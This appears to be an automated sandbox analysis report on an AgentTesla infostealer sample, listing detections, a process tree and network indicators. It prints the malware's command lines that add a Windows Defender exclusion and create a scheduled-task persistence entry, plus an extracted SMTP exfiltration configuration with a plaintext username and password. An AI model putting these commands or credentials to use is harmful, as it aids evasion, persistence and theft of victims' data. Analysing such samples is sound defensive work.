Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Analysis ID:1391079
MD5:2d291baedb79ee55daa67417103f0905
SHA1:810f2f9576976b3e68a610fbe2797b148c82766c
SHA256:0df39b8c26a1b395b2389908f7dc4781aabba0aa10f4642baf46b8f1a9e2c426
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe (PID: 5244 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe MD5: 2D291BAEDB79EE55DAA67417103F0905)
    • powershell.exe (PID: 6984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5332 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7424 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5060 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lnYkIr.exe (PID: 7344 cmdline: C:\Users\user\AppData\Roaming\lnYkIr.exe MD5: 2D291BAEDB79EE55DAA67417103F0905)
    • schtasks.exe (PID: 7656 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lnYkIr.exe (PID: 7708 cmdline: C:\Users\user\AppData\Roaming\lnYkIr.exe MD5: 2D291BAEDB79EE55DAA67417103F0905)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "laju.varghese@grupocatqla.com", "Password": ")Ivlmuj5"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.3365723059.0000000000437000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 18 entries
            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x321c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x32235:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x322bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x32351:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x323bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3242d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x324c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32553:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                10.2.lnYkIr.exe.441fa30.11.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.lnYkIr.exe.441fa30.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 24 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessId: 6984, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessId: 6984, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lnYkIr.exe, ParentImage: C:\Users\user\AppData\Roaming\lnYkIr.exe, ParentProcessId: 7344, ParentProcessName: lnYkIr.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp, ProcessId: 7656, ProcessName: schtasks.exe
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, Initiated: true, ProcessId: 7276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49729
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, ProcessId: 5060, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessId: 6984, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, ProcessId: 5060, ProcessName: schtasks.exe
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "laju.varghese@grupocatqla.com", "Password": ")Ivlmuj5"}
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeReversingLabs: Detection: 28%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeReversingLabs: Detection: 28%
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeJoe Sandbox ML: detected
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: u2R6%?_S
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: $%5'$:
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: `R cvJW&H(D(WAG
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: cSXU]QyT~SXU]LyTcSEU]QyIcSXU]QyTcSXU
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: 0=1 ?"6
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: vFCY,)-
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: uZ_C)
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpackString decryptor: rUB]TYSE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: sKdvLcn.pdb source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr
                    Source: Binary string: sKdvLcn.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 4x nop then jmp 0B7F01F1h0_2_0B7F0422
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 4x nop then jmp 0768EF19h10_2_0768F14A

                    Networking

                    barindex
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.5:49729 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.5:49729 -> 208.91.198.143:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: ip-api.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.0000000001390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingCi
                    Source: lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingyi;
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.0000000001390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0A
                    Source: lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.usertru
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2145030822.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2186008382.0000000003228000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, J4qms1IPBw.cs.Net Code: _4SbXE

                    System Summary

                    barindex
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.lnYkIr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.2df41e8.5.raw.unpack, Architectural.csLarge array initialization: : array initializer size 17982
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_052B79E80_2_052B79E8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_052B03A80_2_052B03A8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_052B0D680_2_052B0D68
